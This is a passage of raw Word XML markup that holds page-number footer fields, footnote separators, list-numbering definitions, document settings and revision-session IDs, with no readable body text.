            </w:rPr>
            <w:t>195</w:t>
          </w:r>
        </w:fldSimple>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48868"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w:rsidR="00C23A43" w:rsidRDefault="00B56D78" w:rsidP="00AE4D37">
        <w:pPr>
          <w:pStyle w:val="ad"/>
          <w:ind w:firstLine="0"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:fldSimple w:instr=" PAGE   \* MERGEFORMAT ">
          <w:r w:rsidR="00DD50E0">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>1</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26ED" w:rsidRDefault="00E326ED" w:rsidP="00086055">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00E326ED" w:rsidRDefault="00E326ED" w:rsidP="0008605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bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="1429" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="00777B60"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B61CECBC"/>
    <w:lvl w:ilvl="0" w:tplc="6DAE3400">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="14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11B1A0B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="88B89340"/>
    <w:lvl w:ilvl="0" w:tplc="C700BF5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1D73401"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="45A88AA8"/>
    <w:lvl w:ilvl="0" w:tplc="B6C652A0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1429" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="2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28437E1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F0BAD38E"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="a"/>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3143836"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="43487000"/>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08AE203D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0C6CCE14"/>
    <w:lvl w:ilvl="0" w:tplc="C700BF5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B0D2BE0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FD4E3D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D5E138F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="13BEB1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F63752F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB52AE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FA847DC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B6C0E0A"/>
    <w:lvl w:ilvl="0" w:tplc="ED3EF26C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1429" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="2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3CD4336"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="463847F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16AE4628"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="814E0A30"/>
    <w:lvl w:ilvl="0" w:tplc="4E2C73AA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="a0"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="964"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="72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17583850"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1C30BDF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8343220"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="76063312"/>
    <w:lvl w:ilvl="0" w:tplc="C700BF5C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1077"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04190001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"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1AA55C59"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1752F8C2"/>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1EA273BB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4F723E0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FE8412F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="342E2C0E"/>
    <w:lvl w:ilvl="0" w:tplc="6130FB26">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1287" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="2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243C3B42"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1CD0D7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45D48C4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="91F26366"/>
    <w:lvl w:ilvl="0" w:tplc="C700BF5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28464D04"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A78E9766"/>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28A916F5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F31E8E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28D36E92"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6336A28A"/>
    <w:lvl w:ilvl="0" w:tplc="C700BF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B8670B7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C8502D50"/>
    <w:lvl w:ilvl="0" w:tplc="337EEB64">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1429" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>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2BDC5C15"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D4AC4448"/>
    <w:lvl w:ilvl="0" w:tplc="3E3275D4">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2BEE0751"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B7F23B02"/>
    <w:lvl w:ilvl="0" w:tplc="C700BF5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2D3746B4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="67FEF7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0D46813"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C58290F4"/>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320A6998"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7E46E66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nsid w:val="349339BD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8DAC9702"/>
    <w:lvl w:ilvl="0" w:tplc="B9D48914">
      <w:start w:val="7"/>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35EF586C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3ED6F144"/>
    <w:lvl w:ilvl="0" w:tplc="0419000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1571"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95B11F9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5C5C9F36"/>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397F0228"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D42C1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3CC6304A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0688EABC"/>
    <w:lvl w:ilvl="0" w:tplc="C5689B3E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1429" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="2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3F0B5B4F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="80D61212"/>
    <w:lvl w:ilvl="0" w:tplc="A03C8F2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1AA550F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B87E430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41BC0567"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F9248356"/>
    <w:lvl w:ilvl="0" w:tplc="C700BF5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44912753"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7986971E"/>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nsid w:val="44BB6B15"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F580D348"/>
    <w:lvl w:ilvl="0" w:tplc="E96C72EC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="a1"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1077"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04190001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"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9">
    <w:nsid w:val="45046DD6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FC780A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468647E6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="100C1032"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
        <w:sz w:val="20"/>
        <w:szCs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7CB7B49"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BF383E3A"/>
    <w:lvl w:ilvl="0" w:tplc="8B5CC9BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1429" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="2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nsid w:val="4C605660"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C51424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4D627EFF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B5423D4A"/>
    <w:lvl w:ilvl="0" w:tplc="C700BF5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4EE8625C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E612EF1C"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="1"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="10"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1944" w:hanging="504"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="2448" w:hanging="648"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3240"/>
        </w:tabs>
        <w:ind w:left="2952" w:hanging="792"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3960"/>
        </w:tabs>
        <w:ind w:left="3456" w:hanging="936"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="3960" w:hanging="1080"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="4464" w:hanging="1224"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5760"/>
        </w:tabs>
        <w:ind w:left="5040" w:hanging="1440"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="45">
    <w:nsid w:val="4F9606AF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0B8446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4FDA34DF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="38DCC9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509A5949"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3ED6F144"/>
    <w:lvl w:ilvl="0" w:tplc="0419000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1571"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50B56E2A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1D2EE82A"/>
    <w:lvl w:ilvl="0" w:tplc="C700BF5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50C97524"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="505AF61C"/>
    <w:lvl w:ilvl="0" w:tplc="3B98B9E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1021"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:rPr>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="53AE96C0">
      <w:start w:val="65535"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:legacy w:legacy="1" w:legacySpace="709" w:legacyIndent="220"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"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0">
    <w:nsid w:val="52124927"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="36B06B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53D27434"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="96EE97CE"/>
    <w:lvl w:ilvl="0" w:tplc="C700BF5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nsid w:val="55E92188"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4BEE793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59804136"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C9C4F2AA"/>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5A455B09"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="68AAD8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5F557AEE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7C6A4F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6109745B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2102B70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631205A3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8046864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633C465E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B0F0529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653F7B86"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A38E29A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0">
    <w:nsid w:val="67F30FFC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1A5209BE"/>
    <w:lvl w:ilvl="0" w:tplc="0324D3A6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1429" w:hanging="360"/>
      </w:pPr>
      <w:rPr>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nsid w:val="68FA010A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="29980886"/>
    <w:lvl w:ilvl="0" w:tplc="A03C8F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94E1E5C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C6B48754"/>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699E275E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E7DEDF8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6F310A61"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9EC2E3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6FD938A1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3B884BA8"/>
    <w:styleLink w:val="Arial"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1429" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        <w:sz w:val="28"/>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66">
    <w:nsid w:val="71341EB0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0B925270"/>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7281117A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="657CB666"/>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76F90D31"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="82100320"/>
    <w:lvl w:ilvl="0" w:tplc="337EEB64">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1429" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:sz w:val="24"/>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69">
    <w:nsid w:val="7AC07C92"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="42B4849C"/>
    <w:lvl w:ilvl="0" w:tplc="BA586BDA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1429" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="2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0">
    <w:nsid w:val="7D464C36"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C1B6DA10"/>
    <w:lvl w:ilvl="0" w:tplc="2182026C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="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7D4A5739"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ED30C7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65"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="4"/>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3"/>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3"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="61"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="55"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="30"/>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num>
  <w:num w:numId="43">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="44">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num>
  <w:num w:numId="58">
    <w:abstractNumId w:val="3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4"/>
  </w:num>
  <w:num w:numId="64">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="65">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="66">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="67">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="68">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="69">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="70">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="71">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="72">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="73">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="74">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="75">
    <w:abstractNumId w:val="3"/>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isplayBackgroundShape/>
  <w:hideSpellingErrors/>
  <w:stylePaneFormatFilter w:val="1728"/>
  <w:defaultTabStop w:val="708"/>
  <w:evenAndOddHeaders/>
  <w:drawingGridHorizontalSpacing w:val="120"/>
  <w:drawingGridVerticalSpacing w:val="381"/>
  <w:displayHorizontalDrawingGridEvery w:val="2"/>
  <w:characterSpacingControl w:val="doNotCompress"/>
  <w:hdrShapeDefaults>
    <o:shapedefaults v:ext="edit" spidmax="21506">
      <o:colormenu v:ext="edit" strokecolor="none"/>
    </o:shapedefaults>
  </w:hdrShapeDefaults>
  <w:footnotePr>
    <w:footnote w:id="-1"/>
    <w:footnote w:id="0"/>
  </w:footnotePr>
  <w:endnotePr>
    <w:endnote w:id="-1"/>
    <w:endnote w:id="0"/>
  </w:endnotePr>
  <w:compat/>
  <w:rsids>
    <w:rsidRoot w:val="006727DD"/>
    <w:rsid w:val="00000FF1"/>
    <w:rsid w:val="00001182"/>
    <w:rsid w:val="0000185D"/>
    <w:rsid w:val="00001BA5"/>
    <w:rsid w:val="00002474"/>
    <w:rsid w:val="0000268E"/>
    <w:rsid w:val="00002F07"/>
    <w:rsid w:val="00003494"/>
    <w:rsid w:val="00004029"/>
    <w:rsid w:val="00005621"/>
    <w:rsid w:val="00007AFF"/>
    <w:rsid w:val="00007DE7"/>
    <w:rsid w:val="00010FE6"/>
    <w:rsid w:val="000111F5"/>
    <w:rsid w:val="00011F74"/>
    <w:rsid w:val="0001353E"/>
    <w:rsid w:val="00014034"/>
    <w:rsid w:val="00014295"/>
    <w:rsid w:val="00015A3F"/>
    <w:rsid w:val="00015B3B"/>
    <w:rsid w:val="00021CAE"/>
    <w:rsid w:val="000225D0"/>
    <w:rsid w:val="00022A5F"/>
    <w:rsid w:val="00022CDB"/>
    <w:rsid w:val="00022ED3"/>
    <w:rsid w:val="00023525"/>
    <w:rsid w:val="00024930"/>
    <w:rsid w:val="00025784"/>
    <w:rsid w:val="000259D5"/>
    <w:rsid w:val="00025B34"/>
    <w:rsid w:val="000268A9"/>
    <w:rsid w:val="0002731D"/>
    <w:rsid w:val="00030095"/>
    <w:rsid w:val="000304C0"/>
    <w:rsid w:val="0003081B"/>
    <w:rsid w:val="0003151F"/>
    <w:rsid w:val="00031F86"/>
    <w:rsid w:val="00032095"/>
    <w:rsid w:val="00033881"/>
    <w:rsid w:val="00033B42"/>
    <w:rsid w:val="00034107"/>
    <w:rsid w:val="00036F96"/>
    <w:rsid w:val="0004045B"/>
    <w:rsid w:val="000407EB"/>
    <w:rsid w:val="00040FDA"/>
    <w:rsid w:val="000418C1"/>
    <w:rsid w:val="0004327C"/>
    <w:rsid w:val="000439B0"/>
    <w:rsid w:val="00043E7D"/>
    <w:rsid w:val="00045752"/>
    <w:rsid w:val="00046714"/>
    <w:rsid w:val="000469BD"/>
    <w:rsid w:val="00047236"/>
    <w:rsid w:val="00047A57"/>
    <w:rsid w:val="00050249"/>
    <w:rsid w:val="00050507"/>
    <w:rsid w:val="00050A55"/>
    <w:rsid w:val="00051468"/>
    <w:rsid w:val="00053024"/>
    <w:rsid w:val="00053449"/>
    <w:rsid w:val="00053501"/>
    <w:rsid w:val="00053A89"/>
    <w:rsid w:val="00053FBD"/>
    <w:rsid w:val="00054C31"/>
    <w:rsid w:val="000555FF"/>
    <w:rsid w:val="00055F39"/>
    <w:rsid w:val="00057F9B"/>
    <w:rsid w:val="00060179"/>
    <w:rsid w:val="00060AD7"/>
    <w:rsid w:val="00061E43"/>
    <w:rsid w:val="000620DC"/>
    <w:rsid w:val="000621E0"/>
    <w:rsid w:val="00062C2A"/>
    <w:rsid w:val="00062E32"/>
    <w:rsid w:val="000641CB"/>
    <w:rsid w:val="000651BC"/>
    <w:rsid w:val="000651E5"/>
    <w:rsid w:val="000676D4"/>
    <w:rsid w:val="000679A7"/>
    <w:rsid w:val="00067B3F"/>
    <w:rsid w:val="00070282"/>
    <w:rsid w:val="00071281"/>
    <w:rsid w:val="000717C8"/>
    <w:rsid w:val="00072F51"/>
    <w:rsid w:val="0007324B"/>
    <w:rsid w:val="00073594"/>
    <w:rsid w:val="00073739"/>
    <w:rsid w:val="000740F5"/>
    <w:rsid w:val="000746DE"/>
    <w:rsid w:val="0007475E"/>
    <w:rsid w:val="00074770"/>
    <w:rsid w:val="00074AC0"/>
    <w:rsid w:val="00075E80"/>
    <w:rsid w:val="000767EE"/>
    <w:rsid w:val="00076CD8"/>
    <w:rsid w:val="0008029F"/>
    <w:rsid w:val="00081D32"/>
    <w:rsid w:val="0008300B"/>
    <w:rsid w:val="000852A1"/>
    <w:rsid w:val="00085423"/>
    <w:rsid w:val="00086055"/>
    <w:rsid w:val="000860CD"/>
    <w:rsid w:val="000861F1"/>
    <w:rsid w:val="00086998"/>
    <w:rsid w:val="00086DEB"/>
    <w:rsid w:val="00086F6F"/>
    <w:rsid w:val="000874E5"/>
    <w:rsid w:val="00087EF5"/>
    <w:rsid w:val="00087F2C"/>
    <w:rsid w:val="000906CE"/>
    <w:rsid w:val="00090BFD"/>
    <w:rsid w:val="0009139F"/>
    <w:rsid w:val="000913A1"/>
    <w:rsid w:val="00092643"/>
    <w:rsid w:val="000932B8"/>
    <w:rsid w:val="00093546"/>
    <w:rsid w:val="00094087"/>
    <w:rsid w:val="000952B8"/>
    <w:rsid w:val="0009582D"/>
    <w:rsid w:val="00095B5D"/>
    <w:rsid w:val="000967BE"/>
